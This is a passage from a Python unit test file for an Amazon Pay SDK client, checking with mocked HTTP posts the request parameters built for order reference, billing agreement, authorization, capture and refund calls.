AmazonPayClient(\n mws_access_key=self.mws_access_key,\n mws_secret_key=self.mws_secret_key,\n merchant_id=self.merchant_id,\n handle_throttle=False,\n sandbox=True,\n region='na',\n currency_code='USD',\n application_name='test_application',\n application_version='test_application_version')\n self.assertEqual(client.application_name, 'test_application')\n self.assertEqual(\n client.application_version,\n 'test_application_version')\n\n def test_properties(self):\n self.assertEqual(self.client.mws_access_key, 'mws_access_key')\n self.assertEqual(self.client.mws_secret_key, 'mws_secret_key')\n self.assertEqual(self.client.merchant_id, 'merchant_id')\n self.assertEqual(self.client._region_code, 'na')\n self.assertEqual(self.client.currency_code, 'USD')\n self.assertEqual(self.client.handle_throttle, False)\n self.assertEqual(self.client.sandbox, True)\n\n @patch('requests.post')\n def test_generic_error_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_generic_error_post\n self.request.send_post()\n response = self.request.response\n self.assertEqual(type(response), PaymentErrorResponse)\n\n @patch('requests.post')\n def test_500_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_500_post\n self.request.send_post()\n response = self.request.response.to_dict()\n self.assertEqual(response['error'], '500')\n\n @patch('requests.post')\n def test_503_response(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_503_post\n self.request.send_post()\n response = self.request.response.to_dict()\n self.assertEqual(response['error'], '503')\n\n @patch('requests.post')\n def test_headers(self, mock_urlopen):\n py_version = \".\".join(map(str, sys.version_info[:3]))\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_service_status()\n if sys.version_info[0] == 3 and sys.version_info[1] >= 2:\n py_valid = True\n \n header_expected = {\n 'Content-Type': 'application/x-www-form-urlencoded',\n \"User-Agent\":'amazon-pay-sdk-python/{0} ({1}Python/{2}; {3}/{4})'.format(\n str(ap_version.versions['application_version']),\n (''),\n py_version,\n str(platform.system()),\n str(platform.release())\n )\n }\n self.assertEqual(mock_urlopen.call_args[1]['headers'], header_expected)\n self.assertTrue(py_valid, True)\n\n @patch('requests.post')\n def test_get_merchant_account_status(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_merchant_account_status(\n merchant_id='A2AMGDUDUJFL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b46293482379')\n parameters = {\n 'Action': 'GetMerchantAccountStatus',\n 'SellerId': 'A2AMGDUDUJFL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b46293482379'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_create_order_reference_for_id(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.create_order_reference_for_id(\n object_id='B01-462347-4762387',\n object_id_type='BillingAgreement',\n order_total='1',\n inherit_shipping_address=False,\n confirm_now=True,\n platform_id='testPlatformId123',\n seller_note='testSellerNote2145',\n seller_order_id='testSellerOrderId21434',\n supplementary_data=self.supplementary_data,\n store_name='testStoreName1234',\n custom_information='testCustomInfo12435',\n merchant_id='A2AMR0DUGHIUEHQ',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06476237468923749823')\n parameters = {\n 'Action': 'CreateOrderReferenceForId',\n 'Id': 'B01-462347-4762387',\n 'IdType': 'BillingAgreement',\n 'OrderReferenceAttributes.OrderTotal.Amount': '1',\n 'OrderReferenceAttributes.OrderTotal.CurrencyCode': 'USD',\n 'InheritShippingAddress': 'false',\n 'ConfirmNow': 'true',\n 'OrderReferenceAttributes.PlatformId': 'testPlatformId123',\n 'OrderReferenceAttributes.SellerNote': 'testSellerNote2145',\n 'OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId': 'testSellerOrderId21434',\n 'OrderReferenceAttributes.SupplementaryData': self.supplementary_data,\n 'OrderReferenceAttributes.SellerOrderAttributes.StoreName': 'testStoreName1234',\n 'OrderReferenceAttributes.SellerOrderAttributes.CustomInformation': 'testCustomInfo12435',\n 'SellerId': 'A2AMR0DUGHIUEHQ',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06476237468923749823'}\n\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_billing_agreement_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_billing_agreement_details(\n amazon_billing_agreement_id='B01-47236478-46253862',\n address_consent_token='AFYDFWIGHUIP',\n merchant_id='ADEIUYIOQUIOW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-7462348237498')\n parameters = {\n 'Action': 'GetBillingAgreementDetails',\n 'AmazonBillingAgreementId': 'B01-47236478-46253862',\n 'AddressConsentToken': 'AFYDFWIGHUIP',\n 'SellerId': 'ADEIUYIOQUIOW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-7462348237498'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_set_billing_agreement_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_billing_agreement_details(\n amazon_billing_agreement_id='B01-47236478-462863428',\n platform_id='testPlatformId89',\n seller_note='testSellerNote3251',\n seller_billing_agreement_id='testBillingAgreement1213',\n store_name='testStoreName5237',\n custom_information='testCustomInfo32365',\n merchant_id='AGDUIEJOQEOPQWIKO',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4623862')\n parameters = {\n 'Action': 'SetBillingAgreementDetails',\n 'AmazonBillingAgreementId': 'B01-47236478-462863428',\n 'BillingAgreementAttributes.PlatformId': 'testPlatformId89',\n 'BillingAgreementAttributes.SellerNote': 'testSellerNote3251',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.SellerBillingAgreementId': 'testBillingAgreement1213',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.StoreName': 'testStoreName5237',\n 'BillingAgreementAttributes.SellerBillingAgreementAttributes.CustomInformation': 'testCustomInfo32365',\n 'SellerId': 'AGDUIEJOQEOPQWIKO',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4623862'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_billing_agreement(\n amazon_billing_agreement_id='B01-47236478-46284638789',\n merchant_id='AGFUHWIEJLMLK',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4263289')\n parameters = {\n 'Action': 'ConfirmBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-47236478-46284638789',\n 'SellerId': 'AGFUHWIEJLMLK',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-4263289'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_validate_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.validate_billing_agreement(\n amazon_billing_agreement_id='B01-47236478-46287462347823490',\n merchant_id='AGFUHWHYDIIJQWL',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc12-457267342897')\n parameters = {\n 'Action': 'ValidateBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-47236478-46287462347823490',\n 'SellerId': 'AGFUHWHYDIIJQWL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc12-457267342897'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_authorize_on_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.authorize_on_billing_agreement(\n amazon_billing_agreement_id='B01-4653268-47632947',\n authorization_reference_id='testAuthRefId31253',\n authorization_amount='1',\n seller_authorization_note='testSellerAuthNote3612367',\n transaction_timeout=0,\n capture_now=True,\n soft_descriptor='testSoftDescriptor42837',\n seller_note='testSellerNote4721893',\n platform_id='testPlatformId47237',\n seller_order_id='testSellerOrderId4237',\n store_name='testStoreName842398',\n custom_information='testCustomInfo623',\n supplementary_data=self.supplementary_data,\n inherit_shipping_address=False,\n merchant_id='A2AMR0FDYHGHJD',\n mws_auth_token='amzn.mws.d6ac8f2d-463286-fhegsdj46238')\n parameters = {\n 'Action': 'AuthorizeOnBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-4653268-47632947',\n 'TransactionTimeout': '0',\n 'AuthorizationReferenceId': 'testAuthRefId31253',\n 'AuthorizationAmount.Amount': '1',\n 'AuthorizationAmount.CurrencyCode': 'USD',\n 'CaptureNow': 'true',\n 'SellerAuthorizationNote': 'testSellerAuthNote3612367',\n 'SoftDescriptor': 'testSoftDescriptor42837',\n 'SellerNote': 'testSellerNote4721893',\n 'PlatformId': 'testPlatformId47237',\n 'InheritShippingAddress': 'false',\n 'SellerOrderAttributes.SellerOrderId': 'testSellerOrderId4237',\n 'SellerOrderAttributes.StoreName': 'testStoreName842398',\n 'SellerOrderAttributes.CustomInformation': 'testCustomInfo623',\n 'SellerOrderAttributes.SupplementaryData': self.supplementary_data,\n 'SellerId': 'A2AMR0FDYHGHJD',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-463286-fhegsdj46238'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_billing_agreement(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_billing_agreement(\n amazon_billing_agreement_id='B01-4236278-3761372',\n closure_reason='testClosureReason',\n merchant_id='A2AMR0DGUQHWIJQWL',\n mws_auth_token='amzn.mws.d6ac8f2d-463286-fhegsdj46238')\n parameters = {\n 'Action': 'CloseBillingAgreement',\n 'AmazonBillingAgreementId': 'B01-4236278-3761372',\n 'ClosureReason': 'testClosureReason',\n 'SellerId': 'A2AMR0DGUQHWIJQWL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-463286-fhegsdj46238'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_set_order_reference_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_order_reference_details(\n amazon_order_reference_id='P01-1234567-7654897',\n order_total='1',\n platform_id='platformId4673',\n seller_note='sellerNote38278',\n seller_order_id='sellerOrderId123',\n store_name='testStoreName387289',\n custom_information='customInfo34278',\n merchant_id='A2AMR0CLHYUTGH',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b06a4628',\n supplementary_data=self.supplementary_data)\n parameters = {\n 'Action': 'SetOrderReferenceDetails',\n 'AmazonOrderReferenceId': 'P01-1234567-7654897',\n 'OrderReferenceAttributes.OrderTotal.Amount': '1',\n 'OrderReferenceAttributes.OrderTotal.CurrencyCode': 'USD',\n 'OrderReferenceAttributes.PlatformId': 'platformId4673',\n 'OrderReferenceAttributes.SellerNote': 'sellerNote38278',\n 'OrderReferenceAttributes.SellerOrderAttributes.SellerOrderId': 'sellerOrderId123',\n 'OrderReferenceAttributes.SellerOrderAttributes.StoreName': 'testStoreName387289',\n 'OrderReferenceAttributes.SellerOrderAttributes.CustomInformation': 'customInfo34278',\n 'SellerId': 'A2AMR0CLHYUTGH',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b06a4628',\n 'OrderReferenceAttributes.SellerOrderAttributes.SupplementaryData': self.supplementary_data}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_set_order_attributes(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.set_order_attributes(\n amazon_order_reference_id='P01-1234567-4827348237',\n currency_code='USD',\n amount='1',\n seller_order_id='testSellerOrderId5371',\n payment_service_provider_id='AGHJHHJKJHL',\n payment_service_provider_order_id='testPSPOrderId',\n platform_id='testPlatformId472',\n seller_note='testSellerNote4628',\n request_payment_authorization='true',\n store_name='testStoreName26157',\n list_order_item_categories=['test'],\n custom_information='testCustomInfo35273',\n merchant_id='AGHJHHJKJHL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b06a4628',\n supplementary_data=self.supplementary_data)\n \n parameters = {\n 'Action': 'SetOrderAttributes',\n 'AmazonOrderReferenceId': 'P01-1234567-4827348237',\n 'OrderAttributes.OrderTotal.Amount': '1',\n 'OrderAttributes.OrderTotal.CurrencyCode': 'USD',\n 'OrderAttributes.SellerOrderAttributes.CustomInformation': 'testCustomInfo35273',\n 'OrderAttributes.SellerOrderAttributes.OrderItemCategories.OrderItemCategory.1': 'test',\n 'OrderAttributes.PaymentServiceProviderAttributes.PaymentServiceProviderId': 'AGHJHHJKJHL',\n 'OrderAttributes.PaymentServiceProviderAttributes.PaymentServiceProviderOrderId': 'testPSPOrderId',\n 'OrderAttributes.PlatformId': 'testPlatformId472',\n 'OrderAttributes.RequestPaymentAuthorization': 'true',\n 'OrderAttributes.SellerNote': 'testSellerNote4628',\n 'OrderAttributes.SellerOrderAttributes.SellerOrderId': 'testSellerOrderId5371',\n 'OrderAttributes.SellerOrderAttributes.StoreName': 'testStoreName26157',\n 'SellerId': 'AGHJHHJKJHL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b06a4628',\n 'OrderAttributes.SellerOrderAttributes.SupplementaryData': self.supplementary_data}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n\n @patch('requests.post')\n def test_get_order_reference_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_order_reference_details(\n amazon_order_reference_id='P01-476238-47238',\n address_consent_token='ADUHIQILPLP',\n access_token='AHJJOKJJHNJNJK',\n merchant_id='ADGJUHJWKJKJ',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b427489234798')\n parameters = {\n 'Action': 'GetOrderReferenceDetails',\n 'AmazonOrderReferenceId': 'P01-476238-47238',\n 'AddressConsentToken': 'ADUHIQILPLP',\n 'AccessToken': 'AHJJOKJJHNJNJK',\n 'SellerId': 'ADGJUHJWKJKJ',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b427489234798'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P01-476238-47263849238',\n merchant_id='AHDGJHDJKFJIIIJ',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42rwe74237489',\n success_url='https://www.success.com',\n failure_url='https://www.failure.com',\n authorization_amount='5',\n currency_code='USD'\n )\n\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-47263849238',\n 'SellerId': 'AHDGJHDJKFJIIIJ',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42rwe74237489',\n 'SuccessUrl': 'https://www.success.com',\n 'FailureUrl': 'https://www.failure.com',\n 'AuthorizationAmount.Amount': '5',\n 'AuthorizationAmount.CurrencyCode': 'USD'\n }\n \n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference_with_expect_immediate_authorization_as_true(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P02-6009038-6480465',\n merchant_id='AWBW6G04XFUTG',\n expect_immediate_authorization=True)\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P02-6009038-6480465',\n 'SellerId': 'AWBW6G04XFUTG',\n 'ExpectImmediateAuthorization': 'true'}\n data_expected = self.request._querystring(parameters)\n # print(data_expected)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_confirm_order_reference_with_expect_immediate_authorization_as_false(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.confirm_order_reference(\n amazon_order_reference_id='P02-0736942-3399325',\n merchant_id='AWBW6G04XFUTG',\n expect_immediate_authorization=False)\n parameters = {\n 'Action': 'ConfirmOrderReference',\n 'AmazonOrderReferenceId': 'P02-0736942-3399325',\n 'SellerId': 'AWBW6G04XFUTG',\n 'ExpectImmediateAuthorization': 'false'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_cancel_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.cancel_order_reference(\n amazon_order_reference_id='P01-476238-472642737489',\n cancelation_reason='testCancelReason',\n merchant_id='AJHDELWJEKELW',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42rw72372897893')\n parameters = {\n 'Action': 'CancelOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-472642737489',\n 'CancelationReason': 'testCancelReason',\n 'SellerId': 'AJHDELWJEKELW',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42rw72372897893'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_order_reference(\n amazon_order_reference_id='P01-476238-472642737489',\n closure_reason='testClosureReason24156',\n merchant_id='AJHYJHJLYFYGTUHK',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87')\n parameters = {\n 'Action': 'CloseOrderReference',\n 'AmazonOrderReferenceId': 'P01-476238-472642737489',\n 'ClosureReason': 'testClosureReason24156',\n 'SellerId': 'AJHYJHJLYFYGTUHK',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_list_order_reference(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.list_order_reference(\n query_id='testSellerOrderId124',\n query_id_type='SellerOrderId',\n created_time_range_start='testStart',\n created_time_range_end='testEnd',\n sort_order='ascending',\n page_size=1,\n merchant_id='AFHRWKJEKJLJKL',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87',\n order_reference_status_list_filter=['test1', 'test2'])\n \n if self.client.region in ('na'):\n payment_domain = 'NA_USD'\n elif self.client.region in ('uk', 'gb'):\n payment_domain = 'EU_GBP'\n elif self.client.region in ('jp', 'fe'):\n payment_domain = 'FE_JPY' \n elif self.client.region in ('eu', 'de', 'fr', 'it', 'es', 'cy'):\n payment_domain = 'EU_EUR'\n else:\n raise ValueError(\"Error. The current region code does not match our records\")\n\n\n parameters = {\n 'Action': 'ListOrderReference',\n 'QueryId': 'testSellerOrderId124',\n 'QueryIdType': 'SellerOrderId',\n 'PaymentDomain': payment_domain,\n 'CreatedTimeRange.StartTime': 'testStart',\n 'CreatedTimeRange.EndTime': 'testEnd',\n 'SortOrder': 'ascending',\n 'PageSize': 1,\n 'SellerId': 'AFHRWKJEKJLJKL',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42ryurueruio3uio87',\n 'OrderReferenceStatusListFilter.OrderReferenceStatus.1': 'test1',\n 'OrderReferenceStatusListFilter.OrderReferenceStatus.2': 'test2'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_list_order_reference_time_check_error(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_generic_error_post\n self.client.list_order_reference(\n query_id='testSellerOrderId12444',\n query_id_type='SellerOrderId',\n created_time_range_start='testStart',\n created_time_range_end=None,\n sort_order=None,\n page_size=None,\n merchant_id='AGDJHKWJLHHK',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42r23564783492380',\n order_reference_status_list_filter=None)\n\n if self.client.region in ('na'):\n payment_domain = 'NA_USD'\n elif self.client.region in ('uk', 'gb'):\n payment_domain = 'EU_GBP'\n elif self.client.region in ('jp', 'fe'):\n payment_domain = 'FE_JPY' \n elif self.client.region in ('eu', 'de', 'fr', 'it', 'es', 'cy'):\n payment_domain = 'EU_EUR'\n else:\n raise ValueError(\"Error. The current region code does not match our records\")\n\n \n parameters = {\n 'Action': 'ListOrderReference',\n 'QueryId': 'testSellerOrderId12444',\n 'QueryIdType': 'SellerOrderId',\n 'PaymentDomain': payment_domain,\n 'SellerId': 'AGDJHKWJLHHK',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42r23564783492380',\n 'CreatedTimeRange.StartTime': 'testStart'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_list_order_reference_by_next_token(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.list_order_reference_by_next_token(\n next_page_token='yrtewyy4823749329482394023940',\n merchant_id='AHFUHWJELWJELEJW',\n mws_auth_token='amzn.mws.d8f2d-6a5f-b42r23436248623748')\n parameters= {\n 'Action': 'ListOrderReferenceByNextToken',\n 'NextPageToken': 'yrtewyy4823749329482394023940',\n 'SellerId': 'AHFUHWJELWJELEJW',\n 'MWSAuthToken': 'amzn.mws.d8f2d-6a5f-b42r23436248623748'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n \n @patch('requests.post')\n def test_authorize(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.authorize(\n amazon_order_reference_id='P01-351-461238848937',\n authorization_reference_id='testAuthId123',\n authorization_amount='1',\n seller_authorization_note='testAuthNote123',\n transaction_timeout=0,\n capture_now=True,\n soft_descriptor='testSoftDescriptor12',\n merchant_id='A2AMR0CUYDHYIOW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc3276378843298-fgeswyd')\n parameters = {\n 'Action': 'Authorize',\n 'AmazonOrderReferenceId': 'P01-351-461238848937',\n 'AuthorizationReferenceId': 'testAuthId123',\n 'AuthorizationAmount.Amount': '1',\n 'AuthorizationAmount.CurrencyCode': 'USD',\n 'SellerAuthorizationNote': 'testAuthNote123',\n 'TransactionTimeout': '0',\n 'CaptureNow': 'true',\n 'SoftDescriptor': 'testSoftDescriptor12',\n 'SellerId': 'A2AMR0CUYDHYIOW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc3276378843298-fgeswyd'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_authorization_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_authorization_details(\n amazon_authorization_id='P01-351-461238848937-A42374987239849',\n merchant_id='AGDFHGWEHGWJH',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-bc412328378')\n parameters = {\n 'Action': 'GetAuthorizationDetails',\n 'AmazonAuthorizationId': 'P01-351-461238848937-A42374987239849',\n 'SellerId': 'AGDFHGWEHGWJH',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-bc412328378'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_capture(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.capture(\n amazon_authorization_id='P01-1234567-7654321-A467823648',\n capture_reference_id='testCaptureRefId123',\n capture_amount='1',\n seller_capture_note='testCaptureNote124',\n soft_descriptor='testSoftDescriptor123',\n merchant_id='A2AMR8YRGWKHK',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b06a-472637-753648')\n parameters = {\n 'Action': 'Capture',\n 'AmazonAuthorizationId': 'P01-1234567-7654321-A467823648',\n 'CaptureReferenceId': 'testCaptureRefId123',\n 'CaptureAmount.Amount': '1',\n 'CaptureAmount.CurrencyCode': 'USD',\n 'SellerCaptureNote': 'testCaptureNote124',\n 'SoftDescriptor': 'testSoftDescriptor123',\n 'SellerId': 'A2AMR8YRGWKHK',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b06a-472637-753648'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_capture_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_capture_details(\n amazon_capture_id='P01-4763247-C6472482379',\n merchant_id='A2AYDGTIQUYOHO',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'GetCaptureDetails',\n 'AmazonCaptureId': 'P01-4763247-C6472482379',\n 'SellerId': 'A2AYDGTIQUYOHO',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_close_authorization(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.close_authorization(\n amazon_authorization_id='P01-4763247-A6568472482379',\n closure_reason='testClosure',\n merchant_id='A2ATTYIUHBUMTYU',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'CloseAuthorization',\n 'AmazonAuthorizationId': 'P01-4763247-A6568472482379',\n 'ClosureReason': 'testClosure',\n 'SellerId': 'A2ATTYIUHBUMTYU',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_refund(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.refund(\n amazon_capture_id='P01-4763247-C645749',\n refund_reference_id='testRefundRefId125',\n refund_amount='1',\n seller_refund_note='testRefundNote123',\n soft_descriptor='testSoftDescriptor167',\n merchant_id='A2ATGUHFHWDJEOPW',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b645234782374903')\n parameters = {\n 'Action': 'Refund',\n 'AmazonCaptureId': 'P01-4763247-C645749',\n 'RefundReferenceId': 'testRefundRefId125',\n 'RefundAmount.Amount': '1',\n 'RefundAmount.CurrencyCode': 'USD',\n 'SellerRefundNote': 'testRefundNote123',\n 'SoftDescriptor': 'testSoftDescriptor167',\n 'SellerId': 'A2ATGUHFHWDJEOPW',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b645234782374903'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_refund_details(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_refund_details(\n amazon_refund_id='P01-4763247-R643927483',\n merchant_id='A2ATGUYIOUHIJL',\n mws_auth_token='amzn.mws.d6ac8f2d-6a5f-b6447623479')\n parameters = {\n 'Action': 'GetRefundDetails',\n 'AmazonRefundId': 'P01-4763247-R643927483',\n 'SellerId': 'A2ATGUYIOUHIJL',\n 'MWSAuthToken': 'amzn.mws.d6ac8f2d-6a5f-b6447623479'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n @patch('requests.post')\n def test_get_service_status(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n self.client.get_service_status()\n parameters = {\n 'Action': 'GetServiceStatus'}\n data_expected = self.request._querystring(parameters)\n self.assertEqual(mock_urlopen.call_args[1]['data'], data_expected)\n\n def test_is_order_reference_id(self):\n self.assertTrue(self.client.is_order_reference_id('P'))\n self.assertTrue(self.client.is_order_reference_id('S'))\n self.assertFalse(self.client.is_order_reference_id('X'))\n\n def test_is_billing_agreement_id(self):\n self.assertTrue(self.client.is_billing_agreement_id('B'))\n self.assertTrue(self.client.is_billing_agreement_id('C'))\n self.assertFalse(self.client.is_billing_agreement_id('X'))\n\n def test_response_invalid_xml(self):\n with self.assertRaises(ValueError):\n PaymentResponse('<invalid></xml>')\n\n @patch('requests.post')\n def test_response_to_xml(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertTrue(et.fromstring(response.to_xml()))\n\n @patch('requests.post')\n def test_response_to_json(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertTrue(json.loads(response.to_json()))\n\n def test_response_to_json_utf8(self):\n text = self.response.to_json()\n utf8_text = '{\"test\": \"الفلانية فلا\"}'\n self.assertEqual(text, utf8_text)\n\n @patch('requests.post')\n def test_response_to_dict(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_requests_post\n response = self.client.get_service_status()\n self.assertEqual(type(response.to_dict()), dict)\n\n @patch('requests.get')\n def test_get_login_profile(self, mock_urlopen):\n mock_urlopen.side_effect = self.mock_get_login_profile\n response = self.client.get_login_profile('access_token', 'client_id')\n\n def test_environment_variables(self):\n os.environ['AP_REGION'] = 'na'\n os.environ['AP_MWS_ACCESS_KEY'] = 'AP_MWS_ACCESS_KEY'\n os.environ['AP_MERCHANT_ID'] = 'AP_MERCHANT_ID'\n 